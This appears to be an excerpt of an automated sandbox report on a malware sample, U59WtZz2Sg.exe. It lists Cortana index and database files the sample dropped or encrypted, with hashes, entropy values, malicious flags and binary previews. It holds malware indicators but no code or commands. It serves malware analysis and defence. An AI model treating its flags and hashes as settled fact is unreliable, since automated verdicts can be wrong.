Preview:	.....g...._.{.n.'C.".$u.Tz&/..%....b/...<.l....=...2r.+.........*..g/0.7r&2J.)g.HWj..n...zY.;C9...g..Fn.M...Q...<76..@7.Q8.L...sv.>.Z\|.Lx@.R.H:^..waU.w...%#wZY..j/..Gwd-l.R.Nx...@.@.q.l......2....J.'.k@..6C+\|.=h..J7.c...s.D[....N.......o..5.N...W..iU...+r;&...P.x.Bw.f....EK..P.w.....o.[.h"lT/..HfL+FD.1;.Hc..<}.N..=I........u.,^&b.....I..........Q.z.._..hH.r..=Q...+..AyKl.....<...g..U.0..O....I...V.T.1..w..X..)..8.0...z.%...xj.)}...0e..v..`.V...qP4...>.....%.G.....wy..bjja.;u.$...V..-M.5...bu.O`..}...F;.h......G...;.-V..<......S.V......../... ....Ss...(...y1.'b....L.$?.V..q....j....f..o..-.H...\|>.F...........o..".eB>.@.h........a}...>.)...n.{?..;'?.....J1..r.[.&-...2...;....[R.E.T..$..(....a,.........V..S.4....\|],...f\|.U.w......l.+.....HC.UBf....q.tAfla.hx.s\B/g0..yx..6J4..{.N.F.K.H.........D.~.}..WU.u].!.L......(.wj-..s...]...h.z...b.Az.....H..q.gb....t...KX..2\|.n. .\|R;.:S.j..D.../.z-6..u].6T..n...I.........&M.......I#.Q....1%?j.XU..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00002.jrs

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	3.2079349210948243
Encrypted:	false
SSDEEP:	3072:I8l6o0PQKFlSgU6Il7V8NWo98KQ9ogjPLEAKrspmvRlE4746oBmJmWt7x:IS6CK3xUj7V8xHgjPhKgpmv047INO9
MD5:	F1BBEA9503D7DB08E8EBEBD56DCC30CE
SHA1:	79A6FD198F4944954EBB4211F36E43CE0451CBBC
SHA-256:	70AFC8B510AB0B46CC00C21B7C6B325D21DBE89F97F06AF7C667910A9CD25F12
SHA-512:	184F62F7CD74E7DD51DD0723B34A7DA448DB0CB20B3B138FA886C95F3FF1B5272B68D0B7D507A18CD1DEDCF039E289D03647FB19946193F9783FE3DEA7464D7D
Malicious:	false
Reputation:	unknown
Preview:	.....\|.......r..n.U5q...fL[Bw..n.......{&..T.8..:..g...i....?...D..l.CC).o..s..H.M...u70...A1.>x....n$A.n.+X.<n.].^.U....{........&....R]+..[-=.]...z......v..j.A....P....8?.....J..VN..o...... ^.&........$...yD..).C5..4..=.a.G...;.._.$...<....E......W.0.8.j.;..e...W.j......=Y..3..o.b..........N..._..s.......#...l.....@....l...u.Qez...jJ.B.<..B<...U.31L....!.R...;...p.#...../2...8.;......+.........N`..q.$Gs-....}..._.x..'..g K5d....8!]..K3.D...P/.......^.:N.U....................^..,...V'...!...OT........B.K_.t......AW...8*.F...x_.....mu...a...s..#.d.X.D\N2.D9".)...l..>..>.Gt.d.Q....}...}.......Q.W.Y4..m...UH.....'A...7!P.d.#<.`...gH4/..yj.W...Nx....P...zZ..G+.=.....W.}....,....:...f.]i. ..... g...<@{..8I.P.D......$Y/...O..\t...=.C...9..n..w/.......(.X(..C8..N..k...j.....&r..)l..2Q....ANX..T.{C~T..^..5..]..N..w4L.\|.. .U.z#.......q..@v.Z.....`.s.tN:.c...B..-..HG....6...y[/._v^"T........x.{.uw...F..mi....u.......-.....z.T...'..+.H$0.......

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbtmp.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	3.206541719709672
Encrypted:	false
SSDEEP:	3072:2bgSFKjVHDglbqzrA4OwAV17zVcooullxZj2GhyJwfomzMg3UaZ6:WgScjVieFAbzVc3ijhiwgmz0e6
MD5:	D669C16EDFF72C2B317A49AEE31AAE89
SHA1:	8D9147418FA9D126822D42431ECCC9E9772943C6
SHA-256:	4A2902619EBF94C9041AC23C59365EB9AF144EC54055A041DC060D069795A88E
SHA-512:	6D174A7EB2BFEDA2D6D628A4AB626C6DC4FE9E076D918E50C6DC350EF02B0DF699A33CC5701DBC24FF780C162D38E85C23120A6604290B19B9B8911E55B35F6C
Malicious:	false
Reputation:	unknown
Preview:	......d1......D1...U..0...C8...t.O(....\....Y.....D..De4.`.?.L........+/...V2....o.[&..._..W..............P\|.'.p....\|..J%v4.o.....tJ.i.~[......{.xTq....%D....;F..-...1g....Y.#....u..n...`.V.....B..$...p.His.....f...(...(.s.NV..0..7A.l8.....b._g.lZM.~>.^.S.`..W.4..y.....q.l+X%.S..A..%o..(8^t~v..ED/H...s}.. ...&.#F..`..wu..H@V..!.].`a.D.@A.b.)...H~....`..2Y.h_%.....{.^DL$m;#..nn.w.....^..._T...O..h.]R.......M.].......m..k....=i.j,o...J..s......$vA\.A.Q.k..9....0..Y"._........kp.!Y..b...?....1.j..Xn.-u..3...^.R.!.$z...w:.o......_a......'..o9.......Y .d..].f.IBG....O=....3..l...yR.5..w..+..diuf..@..5....stn"..W!.q..8a....yo/..dE.t.K....K.l...........w<._...\|..}f.Y.1F.,...e...B.....9.R.sc....&.....:.C.f.!Xei...s-~..G{...qn.n.......q...N.r....lF.....=.....G.R.i.....md.Y..y.H.S.7...o.4.......,...//...A..4..A...k&....[.n............o...H..R7........$..H.z.....5.Wq.......F..&...........>..l.m.M?.,A.....U ..Z.r\P.a.'JuPM...].i4.Z.......J

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\0.0.filtertrie.intermediate.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	20591
Entropy (8bit):	7.991836416225542
Encrypted:	true
SSDEEP:	384:8PV+iDYfgMCBRJ5jD1kDbzXcjzquZ6h0uMlvEcUJZNxSJyyyG8e:diDYo5BRb1kDHcjzqW6bc8NoJwe
MD5:	6DAC19164B2EA852520D1C5133B3FC09
SHA1:	B6F4FA8B845BD0BF0F268AD5C91D431712552874
SHA-256:	EFC360FF4D5E6EA18957DD2601FC19BA89266CC1F63E2B5490DD13A4633E7A3B
SHA-512:	B61DF32CF211399980EC1A4C489E75F5697171168D420BA3100128697D5622219D9978016A217454E4B35F6F7999F9E4D3F05E67CF4D5A5F1B2F94AC59FBCA59
Malicious:	true
Reputation:	unknown
Preview:	0.0...m.l/...:\|;.?..~zA#..]A..w.>S.77.@........'0j.4<{.9HA-....._8.......^.f..F...A.i... ..+ .Z....3 .q.Sj...FB....'.i?5.^..D._....Wk...>.R...FIg.s.....Hj.....@...H`%..n..]Z.........A..y.....b..`...38.:..}.........J'i....ka....+.d.&.+.....].V....~...'...di. j....i0...... .7.:....0..z..S.ead..H\....x.Y.q....8.0J".e3..B...0]c.&n....h^...eM,.(.8..v....^......Tz..{.. ...N~...U....H...\!....,..C......<.].S...L..3..}.RQY^.....03...y.k`...O.....)H[{.+"..dU...u.....sIi.j.$['.....+.F..R...k.....0.&i..X..s.\E.....0...F.......#.50{......5=.-]6,..X.....xJ..x..,.<.o..70rx..6;....RF.G.<.i.4.K......>'.....R.n..<IT.......o..\..E.:....5..'h.T2...DV..f..:....7\|g'.Z....R.:A.......UJ[....Q .u.-........Y........5f.B+..^,.,CJ....N?.u...F..H@@.t....{<Fe.%..v3..>.TS...t.5..;.......Z..........f.<%..O.$..$.QSE...B.#.@..Z..Xw...P...g....R6.6.D..d.jw...8.........(.6..\J.....JU-%V..{c.J9..j...b...u.L..9.&..z5e...~v........0.:..g.-...S...w...9....Q+.....8.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\Apps.ft

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	27488
Entropy (8bit):	7.992814064791938
Encrypted:	true
SSDEEP:	768:+9M405XVTJeOwCOor9iNxcSR5QAQ8fxvPnXCWvsg:bnFTepyinc4RJHSWvsg
MD5:	ABD17D18A2A778E7BAA91F1DF86E1EF1
SHA1:	163CAA0BBAB43CB770F7B9C9CC945F2DFDC785AE
SHA-256:	86DBAE149590546F087F1FECE66B93E36831B3752DF9FFF05EAE5E7FC8FA0375
SHA-512:	58D2FE0F92FFB552F6D2215EFD2231960E5EDE37CECD24DA501E4ACBA3ACEDCBB3A79B7A02476AE9B659EA332CF935BEE18640202B5FDC4852C79AA26AE6B57E
Malicious:	true
Reputation:	unknown
Preview:	.....?...K5..I..C...-. G.`0.3..}.n....i...: .r~~................/..".P.c..e!....R5...pI.M.BO~.F..74.._.TYo~....%.8...C.U....a...cf.Y....p...l.............XDm..d..A5.-T........ @<......JLs?...3..2..Q...s.7......p..Qs6X.........5+d...GA.70.J.bo..ae..?.0..,.....S.X.....j.........ZH...}.5.I.....Zv2qBF.9+....I.i....]6.v.E+.5.(....5l..Wa..j4f.f".....82........@D%.M.S<..\..ev..,.]~+......=4....Bw......k.P].~.I...~...F.. ...h.f...!..B...=.....+......J....wUM....W..D.....1......N(.UT...asJ.v..l@...'..a.I..9.\.@O...6.(E.^.).R...Mxry.#.m{3c.S..I...3.h.Y90.UT4.RpP.".,..g.N..h..[A.;..^f.8}S.6.1...+,%.W7..Rn.:.}.^b.yH..B.mG.{.&..}.......J..N.......E \|...+l.D.....0.&.......'.9....2 .l.g.Z.V.....J.}.T.....B..S9.9L....c.I..N..w.M-4.O.H\N....9.....K.....9k.s3...0t..s..<g..9.>...r/..u-;vji..Rh.z.\|.'../.m...7/zf...uPJ...+ir.R\.EJ.\....Mw.?k..4.............\|...q........7...j.....xD..!.h.\|.h..q.o..~.-.W..L.J.^..`.e..dc...{.7s..@}.!o]T*...~.E/..l].F(.N(

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\Apps.index

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	146368
Entropy (8bit):	7.998765196337213
Encrypted:	true
SSDEEP:	3072:ifQhhVBSA2EEcUbiSzje6uTf22uucQBwSy6RxS3MOYFpha8g3YM170JJ52:1DVBSA3WjeCnucuJRqcFTabYrJ52
MD5:	162178B736D60A255AC6C0D626B9F954
SHA1:	E56517A8D0CB66338EC3BD4A8796DC14347C19DC
SHA-256:	73FA8B128FA4BF3C59AD9331D352BA66125B7298FB1DE34E2259767E6BE01311
SHA-512:	17FE01F7AB7CDEDBFAC6D253778DA3F2EA21424926B40D45EBC5D6DCDD14CBBBB4B429D535D95FB889474716BDEC478DD69A9DCDCB81C12B77B3CCA9834B5BA5
Malicious:	true
Reputation:	unknown
Preview:	Ej..D^.&n0.......i.M.UL...m....`..49jt...X.z...)5.m&..&8..yL..d.]....~.I.;...:.....Z=]Qaja..az...._....M...OO..f..0<.2....;..RH.....,.hmwz.+_....T.X.....Tw"G.p..L.rA..eh.......7a...U..Q'..c.B..i..hZ..Z[,... 0.W......g..~3\|.U..'..>u..5.Q.q...Ae&....o0.@5^..C...!.iRb.)......K}d}...\|..4...xI..<.]G.E.N..k.(<...v......?...^....q.9.)/l.4I3.U~..J"....6...7.."...>.........V.^.S...B..9...?r/V..p.D. ...h.....m#.x...J-.O.@......o......}...'j.K........7.%....7.i...n......H&..../...D.....N.%.a``..1....@.[1.n.......:..Wbr.....L\......=(.3...bZEG._.WyV.nB....x..V..C.......^..6..y}.ljAKv(...../.-'.......:8..4.D.m.)..p.,Y....p...p..1W-...[C...%...HW...P..b;..{.......c.BtM>...O@.h[.:...E .7......R?T..f....d.X.......9.i._...Wz....T....+....lE....K......\.'L.2.zu~...M}.F.U..aX..\....B.Y.Y.-Z..#r<<....Hu..8..{..V.=y...,j.I&^..8.{.....N.+....x...\|............W.j-....:]h&..m\|.u].....h.MO.t.\..lM."2".q.?\..`,..\|.....oL....>.7...b f.......P...'...E.].

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\0.0.filtertrie.intermediate.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	20591
Entropy (8bit):	7.991039496037357
Encrypted:	true
SSDEEP:	384:puqhWSvEIT2E+B0Ukwt3neCc6Sid5OftBrveiiox692r3NyQjpysW1df4iel:wEWNIT2/7km3neh6tujWox1TjoDIl
MD5:	A66DAB19CD170827BDC80645BF624E86
SHA1:	07545213356EE868E3CEEA95113F69D1832850D6
SHA-256:	D7A89DF71A4CD3F71018737CAA82D279E1D6E8BC8E2A34567C3A4AFC8A6572B2
SHA-512:	5EA2FD76F19EB4EF9CEFBB2F8E3FB3F15F31872E7605C7655A9A8A72DBCB6A1F953DF18616040B7CDA5846A15614BBB8D37F6AA24559AB83D170EF4392C37D44
Malicious:	true
Reputation:	unknown
Preview:	0.0......A+....()?cB8..M..2..P.Q........K...t........q....<O........V.U.U...I.=............oXeB@....1..IZx&t..:.A.pKLU..L...'...L4.i.t"..2.L.4T..4sdE_GL..x.........x..w.x=.u..z.M.%.... ....\|.........$t......0S...Alqa.....#../..6..9..ua.......-..,...v.....~6<...L.."..N..d:...g.....a7..G.+.....\|91ds.p....N.E......}..u..,...k..\|5N..-.k1!.3.%.b6,.>.....P........\..........[.<;... ..D<L.9x.e..%...-.4}..\lC\...X.I..k.].h.'[(8K"#L...1YW.8N6=s..>.O:.k....t..p.I.61....B...=~..pV_..l&J.(b..k.i..9]..6)......m.......0..{.....-_.<,".u.F..X@..RJ...fc.6...X..Q....%.z3aa3..0...n#...H....c'........q.{.ZZd.#.O]..m....S..CN../{...M`......N.iJ.U..N34..X..F..N.><!..dtl.e.......T'nW..........!....d..8..<......H..l.?.Q./...4...Y..qy.(...-.kpW..a5(.0.....^..$.SZ"....Kw..v..V?...v.{.F8.).<.m.....:.6.:F..f..t...%\|.;.=.......DKhs9.0...-{..5..oaO...;a%../.r.$pQ.U+\..MF....7o?...a.1XG}.l..eU.:.......1c/...;....... ...q$...q9.-.zKs2pJ.&...k..u....F..A)..H...!S

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\Apps.ft

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	27488
Entropy (8bit):	7.99273703707582
Encrypted:	true
SSDEEP:	384:nRowQRCJZ6FiGMhBgdZcokA3Y99xb4GSl9wsBMQwZG3WVfh8ijVMLrgNqBhIHC5s:K4Z6FmOqHhcGc9n2QwwU6sSPgNqLQYY1
MD5:	1D0BDF08EFC80FD839D9AE7C6286D158
SHA1:	1E2D934D427CB1CA73B0DDECBDD3EE4E805E33F9
SHA-256:	B4815E415D7155F708AA5B77F95851CE9F530DC4EEA625EDA45FEF9B6587588D
SHA-512:	4A8A08A9B6311A68DB27A3E4279AA228F4FC7AD566860D242FDEB1F808F7E4A16C4F9EA8B2AA7506E29B4148253AD1715F6F6DE73A3D7130039E021879A0DCAF
Malicious:	true
Reputation:	unknown
Preview:	......I.....7.#v):a..f3[........(... [..%..:{\|..St..........6...f.]..X.R-..J...R.dt.... .1.8.....;.c...-Yx...kE.....<...m.....q......w8(L~U.;.".[}b....P....1....&_D..U.lj..M.....P,.&....!Hp.t....t>l.....(..6....x..(B.D..7#Y...7k........J$.XS...gj...?w%...f=@Ug....i..L..Sg.RP...T.G#.....B.fkQkT(.... LP..5._/.8..."-1v..+<.....,...](.s.3\|Z..8....A.nIJ-.....G.7...h.%...ee.kC0.z..r^....#...n.8.....(.....gSz.ly....DQC..d[..p...e.~E...t...R.\|v..........c.r...H[y.-0#j.iL..+w<wL..7]Q....cz._...-.At.n.;Y....-(....T...-..y..fv;..Z.^.<D....w.s.vO..A.....9....y..kr......U6Oq.&..o.\|......w ....5.......r...[...R...QC..,s.&-.a.C.j.{$...#.U3]Su....lx...@..@.R...\|..X........VM#W..91.....D..FX.1...)...T.[.....f..B %..m..=.l..o.....)A.4....C.u^z..J..mcLV..{[\|@.]}.....m.Y...z.v....M.9b:R..^n.+(...,.jK.{.X...WA\.CMz\|^,v.......\|..e....{.....[.].>Z@.O.:^y...OA....eRgXw..f..N...R..Pu...W...1..NG$.$.....uX(=...h.g.o...Y.....G...shu.kN*.....J~.F..^e..T.$2

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\Apps.index

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	146059
Entropy (8bit):	7.998711446751529
Encrypted:	true
SSDEEP:	3072:+qE2/xpy444xWqIkZK2wiV3ZhoxdltZqDCo4HExx71z:+YK4XXIkRwuqdfQDhbz
MD5:	2CF7980C78E1DF6590F60670130475C2
SHA1:	0BAD436E8CF01CD463A936D6FE41C4CEFA175CF2
SHA-256:	6E893711980499E72809922C544363265524C0E4D3B522C24DDD1AD9AB8244FC
SHA-512:	B91FC54DC75D2133E75D0C63660286CC10F0CA323FA4F659D6FE3E7C1F3F5F4F261BD826B49D20105B799C971F96B6725AFDAF4DC50602DA942A057136803BA7
Malicious:	true
Reputation:	unknown
Preview:	Ej..D......r..ap..c\|m.#...z.M~)..q..8~.j..}v.....T.bl1#Q@$..YP!.L3.ny..h.j....p #....:...B..s......3/..t.8....0;...$.\./..B.#.(..X.Pt...LO....+.9Uf...}..B...8J...0 ..d5=l.}.e\...."sR.'.C....'.}L$.b.ut..O....a^....R....::..............z..Gf.......%X..^N.3b.q.,....A&.....r...N.......Qup<...).....k!3>.S.d]....J..O....G.\..{?^...30.........`...%."..v%j...$F/.u.Op..'.H..Z..!{9..Kz_lZ.e..Gl.tp9.....J......=.a.2t.[... ...z.mi$H... .#.=.5.G'P...%lK..G..tc.?3...9.s@..e...W..........kX...g....}.({..(...'tk....:l=....5.'Z.`@..<.....F.....Xy.KDD..@..z)...&.E.)Jh.3..?.......0T.$.U\...:..+.3(..U..=..w.emak.^..D....o.....i.\|h..;!.F........PM.0...3.o.j.e...~t.S..0.....=-6f......2..,P..'...m).n.rQdK.f'H......q..%.A.....lGi6..(R.....G.....{..x....2*.Hmd..w.y..p...C.2...".!..{@.SJx..DX.5.w.W<e.Q..s.....C.kg..E.A........c+.1...... i..Y..k...6Bq..d.Y..]ze...... .C...!...4....XM.Et..0B..<....z,. YYJ.'.....fI.$...Uo.C.6k-...2.y=....#.&x..D.R

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\0.0.filtertrie.intermediate.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	20591
Entropy (8bit):	7.990141717772915
Encrypted:	true
SSDEEP:	384:z8rnzzVTg1yj+NuiCeOC2xYp9bZ0ahWh5q6IJH0+e+XzF/iPrRNrW1JwvCBlfrwZ:grnlMYj+0g2xYpj0yAgC+n8P1NrWUvqG
MD5:	A3A4EB303267B2876D9B97B7004ECE21
SHA1:	4CA71E1AEC0ECD827238FE1EC2DDD659F8BBDA4B
SHA-256:	E0DCD263F63D1F4933A638A1F24C86F499F818E9410B8862CD59108501CB6346
SHA-512:	B6E008D25938AB63DC1CF82DAD261469D9D92C679110AEF6ED1595D50EB4D30EB6B2DC1D4E6F548FE73D3F97C084B986C503690AE9F5DF410D0E4CB24C028E85
Malicious:	true
Reputation:	unknown
Preview:	0.0..`X...h..C..j.....^..g@.P...3]..tc}..F.y..;#.W.q....$..d...5../sHmw.]....).<..p....U...V.b%.".IB.......RJ.s\.......WF9F.............:.?.l....+.Q..e=.......<....u.pyG.`....?.wrg.......U.,......T..z.t;...t".w.$.=x.....4...E`PaOM..I..p............t^:.(<.....8c.`..T.4.....[;.oyE%a..B."O...'.:...4d.Rw.&d5g...:.........5W..J...b.D#}..YSMj.-+.(.a~....95]^.G..@v.....s.DO<......{....<.>......\|.....n...A...y..$...`y..5X'.9W./..my^.....]Z.u$..>.........Q.ccsFz..Y.#zd.U.\|.."..W'M ......S.@..[-OQ....+S.f}....I..sF.V.r...........d9...U..]..K\9...(.K.k..m.AR{..f.N...+z..<.W'[.$..0.....~s..Ow...G.3.Ee38n...E..7.....M.Dh.1...Y..\a.e." ...?lQ.I\|...N..(...C.Bk{.......'..ud..8.s.....~.B1.F#...kE.Zj.cB..mS..p....{~b!.[!....n....X%.C..'U.sP........9........;.^K....Fl.?&.P.P..#+++j\|..N...Sn...Q:..._EK.J`F.(?....v..7a.2..^ }...%.......q..$.u....bka.#...A..=..[^ .+.95m...xz7_.T\.T....U?\J<..9G_.o.....T+......3.w.;...91.a.....D)6.+...2}T.h.#..j&P

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\Apps.ft

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	27488
Entropy (8bit):	7.992620142831782
Encrypted:	true
SSDEEP:	768:CeWeNjV4KkEaQyZxIZ8M8fFAYqLhS2UEUDrqrSCIFAjVQGAMuu0WQ02+GC:CZgW5ZOWHeYgh3UDrMSCIFUQO39
MD5:	795D5922F3F9CA3AD362E81C6CC65739
SHA1:	E62C6650764FC93C8A467047288263FD9D65998A
SHA-256:	228214520BF587E97F90D64BAD1F9C4A5315CA19A26A1BEA031E6E9AA68269AB
SHA-512:	93F0ADDD88D42516FB8F5CAEA4C0312A14053E574BA93CBAFB59E16A7E325E8382F3FCE4FC71CBA5335E6D24FEC6C2BF2AAD228D8B63D5AFB2739AC3723147E9
Malicious:	true
Reputation:	unknown
Preview:	.....Lck..K(.>%.lv.S....M.x:.......m.%Ao[q.6 .+..7....A...k)0U...$1.Q.af.......^.eRR..uV......W..UlA.>n3..yM.2......L8..Z.~......h...S..d..1....=.......m...r...Oo.u..,...../..EF..b@.d...n.F%.g8O.].=.j.3.....].F..#~yE.7M.....b.54...VL.... ........>..8H.j..Q.V.7.~..'p....u.....-W......dp...).X.[k"..........%yf..$...2.4...^6.....t"......0.2.6ah..}hB..?.u.}..do..$c.h.}G...0.'A....r...#....Y..XY..AN..N..._........+y{IY.C+d>.8..H.....]..t..x>.O.i_....4vGhaF./H..i......Hyx. ......X!..d...y.........m..H~?[...D4.l..O...[..l...}.<&....B.K.^)..L/....N...~.c9.....^l...cL.5..y..Z.dY........6@xQ..D.<...n.....mf.<.h.3pQ..U'!"...aH.T@..:........u.....Z...gXz...Vn...t...Q.#;.s.k\.Z!..R.Z.N..=K(t.....AY.>RR.6Z..,...F..'i...4.'Et.B.X4..y]......@7.....i...<q.......A..\|..+.......f..^....N.....E.8..z..R#N6].Hh.&..$$...RQ.D..O.....<O..xT..'IA..Z..m."y..~.l.y..._ ...NH.s......nq.#s+.^....rom5.(x.. $; ]~b......]qm.t.t_$}...jY..:.]QI.M.....#LH...h..e.Lr{.r....g.+.KS...KRT

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\Apps.index

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	146059
Entropy (8bit):	7.99878279768305
Encrypted:	true
SSDEEP:	3072:FSAxdeCD1yysVmoJzobs6rkGFDuDGQcEhi6+n8nEI5EvSvmASyegeW:FSAzeCD8ysVzZcoGFDuDG/Ehi6+4EyEA
MD5:	2BD1BBBABC652F25188B89D4B845E0DC
SHA1:	B68C79C2176F04035BDF3686AB97718EF965F2FD
SHA-256:	E14987E3EDB2CFF4852F3503F3D3622AACF782F2A2A633E3FB5A9EAF384EA358
SHA-512:	17E719C76711A0E8B696EC94C7BCF8A502CF8A7D0E68722B38C7FE090B1C6D95219C693470FCD531BD27EA358D06A96AB984780822443131EFEB70FB34FAF293
Malicious:	true
Reputation:	unknown
Preview:	Ej..D-.0..xu...ka.`V<...P....8.y..x...\|U....6N...N7.^Z...h..sN.......:..].\5!OR..;...8.S-....r.0.....8.P......>I...Q._~o.I..c./!..r....K\|.@......x..]..4..I1....Z...yV.t.:Je+>.r..Td..5]c........R#..pM..cq........Ls..o.':P.......g98A...#ffvR.!X..C.\.k.X./........fn...0r...6.........k.xD.T9.s@.x;...].N`....%e.)X...XJ."z......xK....@at.....M....4\.d.}......7.C..!...0q{.%..k.I...~6\..@.....\|....X. a.........1.z>`.EI......."/H..^u.....F."=. ......a......m....}z...#g...&...)7....v.K....:.D....~.....e.zb.7....o.C\...0..d=."...>..2.:.3..m.........C..+....w..O4&...c...d....Y..u..0.....,..B.F......?~.....\|`a-A6...C.R...#.d_.....'8.....y...>.0.....+m.....#.R.jr...4Z..d.......C...PB>...QYS.S.T9.l....{....$F...c..8V.m..@j.k.........n....J...0....?f...L...-..c..[>.....C..F#T..d.E...3t...K.'XF[..v.s..2....6.......f...4....(......l.E..%$a..I\D.a).%.B.da..pd....c.....N...p=..-J.t.R...OY ...:.\|=....V.....2......+S...\..U+I,0.....[$.....1

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\0.0.filtertrie.intermediate.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	20591
Entropy (8bit):	7.990260277182404
Encrypted:	true
SSDEEP:	384:3kJuaq5IJM9ZZe6+Bgwb8U7PzWPlgmHIRwHwflJXIo39MvsKej5:yRq5awe6+58vlgmoCHwfCO
MD5:	93B2F7069A969279092D50347E20CBC1
SHA1:	6140B347FBBE45B73520C15CEE2A6509CD6C3793
SHA-256:	CEF0ABA503D1326CC5CFBC8D69C082AFE42740B6A2C9A6E3AB4FF1C13270BDEE
SHA-512:	E479A6075DAA43AA686801A3EC1B41A65E4BC7351FCFA860EBA390E4B69D9BADA926C0DFFCB1E725C9D01E2003415C2F331080D26459D8E297DB4F40B055D8CD
Malicious:	true
Reputation:	unknown
Preview:	0.0....C8').8p.S..[$..).suB.dw..OTlr......".o............3./....;..:X.Z.b..`...w...}D.h&5..m....n....c..%. .o.r..Jl.. .G.D.@.WZ..('..6.........m.\.8.....+..s.0w:Q.6..3.V..2..>7+Z?k~>....xJ.I8!_`Xt;..:u.{bvJ....yQ#..j..3.F..Zq...[ez..V40........Z..U,.U&...q....Cd.......R&.be.).......p..(-._E....9..9......e.z......Q...wVrpN.-...... ....d,.[.N...G.<.#)8.b...?n......~'hW...6.>...k.......=X.DP...#..V..M.4Y......5.>O)...M..\}..p..rg.~{cU......j....#..x.A....T.S../.l......d......!....,.~M.W.......x..r~..>.~._[...3....a.N.7B.0.ky..?.d........"$!......;...8.e.E.2...4y.n.w._ ..v..?.it).!.*@Z.#..{Q.}.)..F\.:.9l.....Da.#G.....UV.....$...t.....b.'.0.u.1...._.2...%.~T.....A,..~U_......Lp;)......D.b..5B...=.u'.2..........z8"...751.x.m.G.^Jz...@..._k&..[..iFJ..n...#.M....BA(.A..M.\.@V...c.gr.\...o..Qa..vi...[........U...Nf.... A..p.}.y..v6.z-......4...w'....z.Y@..._...0..y...W..o:.2B...:H.I<....2....+.AT..\|.,G....L.v:..Y.[;.&.wy@...DE.c.a.K.Uz.H........

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\Apps.ft

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	27488
Entropy (8bit):	7.994427431230149
Encrypted:	true
SSDEEP:	768:Qb0lFt5kuEhA6wc37fBmjdD7crcsN4mVCzc0ytothNM:Z3albwc37fI9crynyteNM
MD5:	B8647DD66E26BCF32328D24B32451CAC
SHA1:	F58F0FD49EFB07B5D221E89F0A7EE643DA993135
SHA-256:	A8AABBE0571031DB1961145A8247FF889EEEE328B6DDF3F05C901257E2A11DBA
SHA-512:	1F99889621339078BDCB69E0D701D766ABF6E36CEA512E4F87AC35AB6C049D1ECC6DF234844098BE82FF9CE8E7DE151B7997FAD2E9F539D47D515429D88687E1
Malicious:	true
Reputation:	unknown
